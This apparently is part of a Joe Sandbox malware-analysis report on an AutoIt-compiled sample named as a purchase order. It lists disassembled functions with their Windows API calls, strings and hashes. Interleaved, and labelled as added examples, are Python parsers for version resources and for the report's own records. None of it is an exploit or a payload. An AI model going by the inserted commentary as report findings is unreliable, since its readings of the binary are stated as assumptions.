                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Foreground
                                                                                                              • String ID: ACTIVE$ALL$CLASS$H+I$HANDLE$INSTANCE$L+I$LAST$P+I$REGEXPCLASS$REGEXPTITLE$T+I$TITLE
                                                                                                              • API String ID: 62970417-2066777689
                                                                                                              • Opcode ID: c32484879a46bfa684267a4d5697e3271636d87a98905ded044d974a585d1733
                                                                                                              • Instruction ID: d197d5c5816b1723c429a149bd275efa92dd73925362dfe559d7748a69cf11e2
                                                                                                              • Opcode Fuzzy Hash: c32484879a46bfa684267a4d5697e3271636d87a98905ded044d974a585d1733
                                                                                                              • Instruction Fuzzy Hash: D6D12830504642ABCB05EF21C9419ABBBB4BF55344F004A2FF845672E2DBB4E95FCB96
                                                                                                              APIs
                                                                                                              • GetCursorPos.USER32(?), ref: 0044778A
                                                                                                              • GetDesktopWindow.USER32 ref: 0044779F
                                                                                                              • GetWindowRect.USER32(00000000), ref: 004477A6
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00447808
                                                                                                              • DestroyWindow.USER32(?), ref: 00447834
                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0044785D
                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044787B
                                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004478A1
                                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004478B6
                                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004478C9
                                                                                                              • IsWindowVisible.USER32(?), ref: 004478E9
                                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00447904
                                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00447918
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00447930
                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00447956
                                                                                                              • GetMonitorInfoW.USER32 ref: 00447970
                                                                                                              • CopyRect.USER32(?,?), ref: 00447987
                                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 004479F2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                              • String ID: ($0$tooltips_class32
                                                                                                              • API String ID: 698492251-4156429822
                                                                                                              • Opcode ID: 92fd49b1d87453485f9b94dc54f2b69b8c16c07cb9c5c12f563ed7e263af428a
                                                                                                              • Instruction ID: d13a66d2ca2df6d0fa4a4fd35b32dfdac62c41f139421948c63fd45b5d2832c7
                                                                                                              • Opcode Fuzzy Hash: 92fd49b1d87453485f9b94dc54f2b69b8c16c07cb9c5c12f563ed7e263af428a
                                                                                                              • Instruction Fuzzy Hash: CCB1B171A08341AFE704DF65C948B5BBBE5FF88310F008A1EF5899B291D774E805CB9A
                                                                                                              APIs
                                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00426CFB
                                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00426D21
                                                                                                              • _wcscpy.LIBCMT ref: 00426D4F
                                                                                                              • _wcscmp.LIBCMT ref: 00426D5A
                                                                                                              • _wcscat.LIBCMT ref: 00426D70
                                                                                                              • _wcsstr.LIBCMT ref: 00426D7B
                                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00426D97
                                                                                                              • _wcscat.LIBCMT ref: 00426DE0
                                                                                                              • _wcscat.LIBCMT ref: 00426DE7
                                                                                                              • _wcsncpy.LIBCMT ref: 00426E12
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                              • API String ID: 699586101-1459072770
                                                                                                              • Opcode ID: cb2be6364255704a6b3176eb6e59aa1bf64a0f974a806a5bb6cd931a02ccbdd7
                                                                                                              • Instruction ID: 8db2160a0ce836709947cac81ef822a3e1167bb45ac0417e060996dffaa5c794
                                                                                                              • Opcode Fuzzy Hash: cb2be6364255704a6b3176eb6e59aa1bf64a0f974a806a5bb6cd931a02ccbdd7
                                                                                                              • Instruction Fuzzy Hash: C041E472A002147BEB05AB659C47FBF777CEF41314F24006BF905B61C2EA7C9A0196AA
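                                                                                                              The GetFileVersionInfoSizeW / GetFileVersionInfoW / VerQueryValueW chain above, together with the \VarFileInfo\Translation, StringFileInfo\, %u.%u.%u.%u and 04090000 literals, is the classic version-resource lookup (consistent with the AutoIt runtime's FileGetVersion, given the "AutoIt v3 GUI" class name elsewhere in this dump). What follows is an added example, not code from the report or from AutoIt: a pure-Python parser for the VS_VERSIONINFO block layout that performs the same lookup offline on a version resource constructed inline, so the chain can be reasoned about without running the sample. The sample strings, the order in which translation entries and the 04090000 fallback are tried, and the case-insensitive key match are assumptions of this example, not facts taken from the binary.

```python
import struct

# Added example (not from the report or from AutoIt): a pure-Python model of the
# FileGetVersion-style lookup implied by the listing.  The VS_VERSIONINFO blob is
# constructed inline so the script runs offline; on a real PE the same bytes come
# from the RT_VERSION resource (GetFileVersionInfoW returns exactly this buffer).

FALLBACK_LANG_CODEPAGE = "04090000"  # literal seen in the listing; tried last here (assumption)


def _block(key, value=b"", wtype=1, children=()):
    """Serialise one VS_VERSIONINFO-style block: WORD wLength, WORD wValueLength,
    WORD wType, UTF-16 szKey, DWORD padding, Value, DWORD padding, Children."""
    out = bytearray(b"\0" * 6) + (key + "\0").encode("utf-16-le")
    if value:
        out += b"\0" * (-len(out) % 4)
        out += value
    for child in children:
        out += b"\0" * (-len(out) % 4)
        out += child
    # wValueLength counts WCHARs for text blocks (wType 1) and bytes for binary (wType 0).
    vlen = len(value) // 2 if wtype == 1 else len(value)
    struct.pack_into("<HHH", out, 0, len(out), vlen, wtype)
    return bytes(out)


def build_sample_versioninfo(table_key="040904B0", translation=(0x0409, 0x04B0)):
    """Constructed sample resource (hypothetical strings, not from the analysed file)."""
    # VS_FIXEDFILEINFO: signature, struct version, FileVersion MS/LS = 1.2 / 3.4, ...
    fixed = struct.pack("<13I", 0xFEEF04BD, 0x00010000, 0x00010002, 0x00030004,
                        0x00010002, 0x00030004, 0x3F, 0, 0x40004, 1, 0, 0, 0)

    def text(k, v):
        return _block(k, (v + "\0").encode("utf-16-le"), 1)

    table = _block(table_key, children=[text("FileDescription", "Purchase order viewer"),
                                        text("FileVersion", "1.2.3.4")])
    sfi = _block("StringFileInfo", children=[table])
    var = _block("Translation", struct.pack("<HH", *translation), 0)  # WORD lang, WORD codepage
    vfi = _block("VarFileInfo", children=[var])
    return _block("VS_VERSION_INFO", fixed, 0, [sfi, vfi])


def _parse(buf, off=0):
    """Parse the block at off (buf must start at the DWORD-aligned resource start,
    so absolute offsets give the right padding); returns (node, end_offset)."""
    wlen, vlen, wtype = struct.unpack_from("<HHH", buf, off)
    if wlen < 6 or off + wlen > len(buf):
        raise ValueError("malformed VS_VERSIONINFO block at offset %d" % off)
    end = off + wlen
    q = off + 6
    while buf[q:q + 2] != b"\0\0":          # szKey is a null-terminated UTF-16 string
        q += 2
    key = bytes(buf[off + 6:q]).decode("utf-16-le")
    q += 2
    q += -q % 4                              # Padding1
    vbytes = vlen * 2 if wtype == 1 else vlen
    value = bytes(buf[q:q + vbytes])
    q += vbytes
    q += -q % 4                              # Padding2
    children = []
    while q < end:                           # Children run to the parent's wLength
        child, q = _parse(buf, q)
        children.append(child)
        q += -q % 4
    return {"key": key, "type": wtype, "value": value, "children": children}, end


def _find(node, path):
    """Walk children by key along a VerQueryValue-style path such as
    ["StringFileInfo", "040904B0", "FileDescription"] (case-insensitive: assumption)."""
    for part in path:
        node = next((c for c in node["children"] if c["key"].lower() == part.lower()), None)
        if node is None:
            return None
    return node


def file_version_number(blob):
    """'%u.%u.%u.%u' from VS_FIXEDFILEINFO, the format string seen in the listing."""
    root, _ = _parse(blob)
    _sig, _ver, ms, ls = struct.unpack_from("<4I", root["value"])
    return "%u.%u.%u.%u" % (ms >> 16, ms & 0xFFFF, ls >> 16, ls & 0xFFFF)


def translation_candidates(blob):
    """Lang/codepage table names to try: every \\VarFileInfo\\Translation entry,
    then the 04090000 fallback (the order is this example's assumption)."""
    root, _ = _parse(blob)
    cands = []
    var = _find(root, ["VarFileInfo", "Translation"])
    if var is not None:
        for lang, cp in struct.iter_unpack("<HH", var["value"]):
            cands.append("%04X%04X" % (lang, cp))
    if FALLBACK_LANG_CODEPAGE not in cands:
        cands.append(FALLBACK_LANG_CODEPAGE)
    return cands


def file_get_version(blob, field):
    """Return the string at \\StringFileInfo\\<langcp>\\<field>, or None if absent."""
    root, _ = _parse(blob)
    for langcp in translation_candidates(blob):
        node = _find(root, ["StringFileInfo", langcp, field])
        if node is not None:
            return node["value"].decode("utf-16-le").rstrip("\0")
    return None


if __name__ == "__main__":
    sample = build_sample_versioninfo()
    print(file_version_number(sample), file_get_version(sample, "FileDescription"))
```

                                                                                                              The second constructor argument lets you model the mismatch case the fallback literal exists for: a Translation entry naming a language/codepage table that is not present in StringFileInfo, where the lookup succeeds only because 04090000 is tried afterwards.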
                                                                                                              APIs
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003FA939
                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 003FA941
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003FA96C
                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 003FA974
                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 003FA999
                                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003FA9B6
                                                                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 003FA9C6
                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003FA9F9
                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003FAA0D
                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 003FAA2B
                                                                                                              • GetStockObject.GDI32(00000011), ref: 003FAA47
                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 003FAA52
                                                                                                                • Part of subcall function 003FB63C: GetCursorPos.USER32(000000FF), ref: 003FB64F
                                                                                                                • Part of subcall function 003FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 003FB66C
                                                                                                                • Part of subcall function 003FB63C: GetAsyncKeyState.USER32(00000001), ref: 003FB691
                                                                                                                • Part of subcall function 003FB63C: GetAsyncKeyState.USER32(00000002), ref: 003FB69F
                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,003FAB87), ref: 003FAA79
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                              • String ID: AutoIt v3 GUI
                                                                                                              • API String ID: 1458621304-248962490
                                                                                                              • Opcode ID: 68a7b0884a520c8a93aa871ba68a48ffc43275318d663ce9b52626f38206dfe0
                                                                                                              • Instruction ID: 2eeea49aa2a8a4c376b21ef0ebc7a91790f82d5064e2a7fd31f98e63c76a22f4
                                                                                                              • Opcode Fuzzy Hash: 68a7b0884a520c8a93aa871ba68a48ffc43275318d663ce9b52626f38206dfe0
                                                                                                              • Instruction Fuzzy Hash: BCB18FB1A0020AAFDB15DFA8DC45BAE7BB4FF08315F154229FA15E72A0D774E840CB56
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00443735
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0047DC00,00000000,?,00000000,?,?), ref: 004437A3
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004437EB
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00443874
• RegCloseKey.ADVAPI32(?), ref: 00443B94
• RegCloseKey.ADVAPI32(00000000), ref: 00443BA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
• Opcode ID: ab1cd001263db679d01ae22f6334b5a7d28aa2db958b5c8fe6bd9b67bd6d256c
• Instruction ID: 6fd32aeb5b17a410aa322cae7e1797e1a8ee406b80354f1a6a8d0a1513d0e720
• Opcode Fuzzy Hash: ab1cd001263db679d01ae22f6334b5a7d28aa2db958b5c8fe6bd9b67bd6d256c
• Instruction Fuzzy Hash: DD0299752046119FDB15EF15C881A2EB7E5FF88720F04855EF98A9B3A2CB34ED01CB89
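Every function record in this part of the report has the same plain-text layout: an "APIs" list of resolved calls with their call-site addresses, optional "Strings", the "Memory Dump Source" and "Similarity" blocks, and the Opcode/Instruction hashes that close the record. When triaging a long report it is easier to parse those records into per-function API sets than to read them one by one. The following parser is an added example, not code from the Joe Sandbox report or its tooling; its SAMPLE input is constructed from the registry-write record above and the LoadCursorW record further down, and the `registry_writers` heuristic, together with the reading of that record as a generic registry-write helper of the AutoIt runtime, is an assumption of this example.

```python
"""Parse Joe Sandbox function records into per-function API summaries.

Added example, not part of the Joe Sandbox report or its tooling. It assumes
the plain-text layout visible on this page: a record opens at an "APIs"
header and closes at its "Instruction Fuzzy Hash". SAMPLE is constructed
from two records on this page plus one subcall-only fragment.
"""
import re
from dataclasses import dataclass, field


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)       # (name, module, ref, via_subcall)
    api_id: str = ""
    string_id: list = field(default_factory=list)  # "String ID" split on the report's '$'
    instruction_fuzzy_hash: str = ""


# "• RegSetValueExW.ADVAPI32(00000001,?,...), ref: 00443874" and the
# paren-less form "• __swprintf.LIBCMT ref: 0041D032"
API_RE = re.compile(
    r"^• (?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
SUBCALL_PREFIX = re.compile(r"^• Part of subcall function [0-9A-Fa-f]{8}: ")
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}


def parse_records(text):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()                       # the dump is heavily indented
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if section == "APIs":                # every record opens with "APIs"
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None:                      # text before the first record
            continue
        if section == "APIs":
            via_subcall = bool(SUBCALL_PREFIX.match(line))
            m = API_RE.match(SUBCALL_PREFIX.sub("• ", line, count=1))
            if m:
                current.apis.append((m["name"], m["module"], m["ref"], via_subcall))
            continue
        f = FIELD_RE.match(line)
        if not f:
            continue
        key, value = f["key"], f["value"].strip()
        if key == "API ID":
            current.api_id = value
        elif key == "String ID":
            current.string_id = [s for s in value.split("$") if s]
        elif key == "Instruction Fuzzy Hash":
            current.instruction_fuzzy_hash = value
    return records


def registry_writers(records):
    """Records that open/create a key and set a value in one function.

    Capability only, not evidence of persistence: in a compiled AutoIt binary
    such a function is consistent with a generic registry-write helper
    (assumption), and the key it writes is chosen by the script at run time.
    """
    hits = []
    for r in records:
        names = {name for name, _m, _r, _s in r.apis}
        if "RegSetValueExW" in names and names & {"RegCreateKeyExW", "RegOpenKeyExW"}:
            hits.append(r)
    return hits


SAMPLE = """\
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00443735
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0047DC00,00000000,?,00000000,?,?), ref: 004437A3
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004437EB
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00443874
• RegCloseKey.ADVAPI32(00000000), ref: 00443BA1
Strings
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• Instruction Fuzzy Hash: DD0299752046119FDB15EF15C881A2EB7E5FF88720F04855EF98A9B3A2CB34ED01CB89
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 004379C6
• GetCursorInfo.USER32(?), ref: 00437A7B
Similarity
• API ID: Cursor$Load$Info
• String ID:
• Instruction Fuzzy Hash: 7B3117B0D0831EAADB609FB68C8995FBFE8FF08750F504527E54DE7280DA78A5008F95
APIs
  • Part of subcall function 003FE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?), ref: 003FE984
"""

if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r.api_id or "(no API ID)", [a[0] for a in r.apis])
    print("registry writers:", len(registry_writers(parse_records(SAMPLE))))
```

Run against the full report text instead of SAMPLE, the parser gives one FunctionRecord per function; the API-name sets are what you match against (for example RegSetValueExW plus a key-creating call, or the window-enumeration cluster of GetClassNameW/GetWindowTextW/SendMessageTimeoutW seen below). Calls recorded as "Part of subcall function" are kept but flagged, since they belong to a callee rather than the function itself.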
APIs
• CharUpperBuffW.USER32(?,?), ref: 00446C56
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00446D16
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
• Opcode ID: d01b79ace68e8d19fe25d9dc1a0b4ab658d9c72866ff676d0dc4369ef5927530
• Instruction ID: 6d54c34eb5036cd076fd28d6ac3fd0589b233bc0a1232b496f71245fe4ac4cd2
• Opcode Fuzzy Hash: d01b79ace68e8d19fe25d9dc1a0b4ab658d9c72866ff676d0dc4369ef5927530
• Instruction Fuzzy Hash: 71A1BF702042459BDB15EF21C851ABBB3A1FF85314F11896EF9965B3E2DB38EC06CB46
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0041CF91
• __swprintf.LIBCMT ref: 0041D032
• _wcscmp.LIBCMT ref: 0041D045
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0041D09A
• _wcscmp.LIBCMT ref: 0041D0D6
• GetClassNameW.USER32(?,?,00000400), ref: 0041D10D
• GetDlgCtrlID.USER32(?), ref: 0041D15F
• GetWindowRect.USER32(?,?), ref: 0041D195
• GetParent.USER32(?), ref: 0041D1B3
• ScreenToClient.USER32(00000000), ref: 0041D1BA
• GetClassNameW.USER32(?,?,00000100), ref: 0041D234
• _wcscmp.LIBCMT ref: 0041D248
• GetWindowTextW.USER32(?,?,00000400), ref: 0041D26E
• _wcscmp.LIBCMT ref: 0041D282
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
• String ID: %s%u
• API String ID: 3119225716-679674701
• Opcode ID: 9bb50d50f648337d89ecab623aec1c74176a99c53e3106e5ca2059192b3e2dbe
• Instruction ID: 5a1688fe307c069b06a2015af674610e4d043d4fb7087c0e10e0b601a30799ad
• Opcode Fuzzy Hash: 9bb50d50f648337d89ecab623aec1c74176a99c53e3106e5ca2059192b3e2dbe
• Instruction Fuzzy Hash: BBA1B5B1A04302AFD715DF64C884FEBB7A8FF44354F00452AF969D2290D778EA85CB99
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0041D8EB
• _wcscmp.LIBCMT ref: 0041D8FC
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0041D924
• CharUpperBuffW.USER32(?,00000000), ref: 0041D941
• _wcscmp.LIBCMT ref: 0041D95F
• _wcsstr.LIBCMT ref: 0041D970
• GetClassNameW.USER32(00000018,?,00000400), ref: 0041D9A8
• _wcscmp.LIBCMT ref: 0041D9B8
• GetWindowTextW.USER32(00000002,?,00000400), ref: 0041D9DF
• GetClassNameW.USER32(00000018,?,00000400), ref: 0041DA28
• _wcscmp.LIBCMT ref: 0041DA38
• GetClassNameW.USER32(00000010,?,00000400), ref: 0041DA60
• GetWindowRect.USER32(00000004,?), ref: 0041DAC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 04aee282535ef809687832b7cf74eb006e13667e9fb6b2c7994df2d413512f7a
• Instruction ID: fa408dbf2db2bc85bf46f30f9b6fe837d90bb564442ca044d92fd474e11595f1
• Opcode Fuzzy Hash: 04aee282535ef809687832b7cf74eb006e13667e9fb6b2c7994df2d413512f7a
• Instruction Fuzzy Hash: 5F81D3B19083459BDB05CF10C881FAB7BE8EF44344F04446BFD8A9A195DB78ED85CBA9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: 34aaaa6ba5d897def1218184cd7bea7893b7edf20c54adeeba270f734e6aeaba
• Instruction ID: 3075fb89cb5ff20622f54ecac8c093d2d6fd4de14cf87482d40a9531608b201c
• Opcode Fuzzy Hash: 34aaaa6ba5d897def1218184cd7bea7893b7edf20c54adeeba270f734e6aeaba
• Instruction Fuzzy Hash: CE31CE71A44255BADF15FE11CE43FEEB7A49F20344F30023BF421750D1EBA9AA44C669
APIs
• LoadIconW.USER32(00000063), ref: 0041EAB0
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0041EAC2
• SetWindowTextW.USER32(?,?), ref: 0041EAD9
• GetDlgItem.USER32(?,000003EA), ref: 0041EAEE
• SetWindowTextW.USER32(00000000,?), ref: 0041EAF4
• GetDlgItem.USER32(?,000003E9), ref: 0041EB04
• SetWindowTextW.USER32(00000000,?), ref: 0041EB0A
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0041EB2B
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0041EB45
• GetWindowRect.USER32(?,?), ref: 0041EB4E
• SetWindowTextW.USER32(?,?), ref: 0041EBB9
• GetDesktopWindow.USER32 ref: 0041EBBF
• GetWindowRect.USER32(00000000), ref: 0041EBC6
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0041EC12
• GetClientRect.USER32(?,?), ref: 0041EC1F
